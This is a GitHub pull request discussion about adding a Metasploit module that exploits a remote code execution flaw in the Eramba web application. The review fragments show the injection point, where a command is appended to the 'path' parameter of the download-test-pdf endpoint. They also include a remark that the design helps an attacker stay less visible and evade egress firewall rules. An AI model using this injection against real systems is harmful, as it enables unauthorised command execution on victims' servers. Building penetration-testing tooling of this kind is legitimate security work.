Add Eramba Remote Code Execution Exploit #19494
Conversation
|
Hello @trvnt-stefan , is there a reason to code this as an auxiliary rather than writing this as an exploit and creating a meterpreter session? |
| 'uri' => login_url | ||
| }) | ||
|
|
||
| unless res && res.code == 200 |
There was a problem hiding this comment.
| unless res && res.code == 200 | |
| unless res&.code == 200 |
| fail_with(Failure::UnexpectedReply, 'Failed to retrieve the login page') | ||
| end | ||
|
|
||
| doc = Nokogiri::HTML(res.body) |
There was a problem hiding this comment.
| doc = Nokogiri::HTML(res.body) | |
| doc = res.get_html_document |
| } | ||
| }) | ||
|
|
||
| if res && res.code == 302 |
There was a problem hiding this comment.
| if res && res.code == 302 | |
| if res&.code == 302 |
| }) | ||
|
|
||
| print_good(redirect_url) | ||
| if res && res.code == 500 |
There was a problem hiding this comment.
| if res && res.code == 500 | |
| if res&.code == 500 |
| command_encoded = URI.encode_www_form_component(datastore['COMMAND'].to_s) | ||
| redirect_path = "/settings/download-test-pdf?path=#{command_encoded};" | ||
| redirect_url = normalize_uri(target_uri.path, redirect_path.to_s) |
There was a problem hiding this comment.
| command_encoded = URI.encode_www_form_component(datastore['COMMAND'].to_s) | |
| redirect_path = "/settings/download-test-pdf?path=#{command_encoded};" | |
| redirect_url = normalize_uri(target_uri.path, redirect_path.to_s) | |
| redirect_path = "/settings/download-test-pdf?path=#{URI.encode_www_form_component(datastore['COMMAND'])};" | |
| redirect_url = normalize_uri(target_uri.path, redirect_path) |
|
When adding a module to Metasploit, it's essential to also include the corresponding documentation. This helps other users and developers understand how to use and test the module. Please refer to the following guide to learn how to write module documentation: https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html |
| OptString.new('TARGETURI', [ true, 'The base path to Eramba', '/']), | ||
| OptString.new('USERNAME', [ true, 'The username to authenticate with']), | ||
| OptString.new('PASSWORD', [ true, 'The password to authenticate with']), | ||
| OptString.new('COMMAND', [ true, 'The command to execute', 'whoami']), |
There was a problem hiding this comment.
This should really be an exploit module delivering an ARCH_CMD payload. That would allow the user to open a session and start a handler automatically. We also have generic command payloads if the user wants full control over the command and need to, for example, execute whoami.
There was a problem hiding this comment.
We are considering developing an Exploit module in addition to the Auxiliary one. Please see my comment below for the reasons why.
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
Yes, we see the following advantages in providing separate modules for all RCE vulnerabilities, one under Auxiliary and one under Exploit. Firstly, the pure RCE provides more opportunities for an attacker to remain less visible; secondly, the FW rules on the victim side can prevent outbound connections; also, the environments can be configured completely differently, which we have already experienced in the production and test environments. |
|
Hello @ssmmkkxxzz, if I'm not mistaken, you can actually run system commands directly from the exploit module using a custom payload. For example, you can set This way, the command will be executed without needing an auxiliary module or a reverse shell. It's simpler and keeps everything within the exploit. |
This PR add a new auxiliary module to exploit a RCE vulnerability in the web application Eramba.
Verification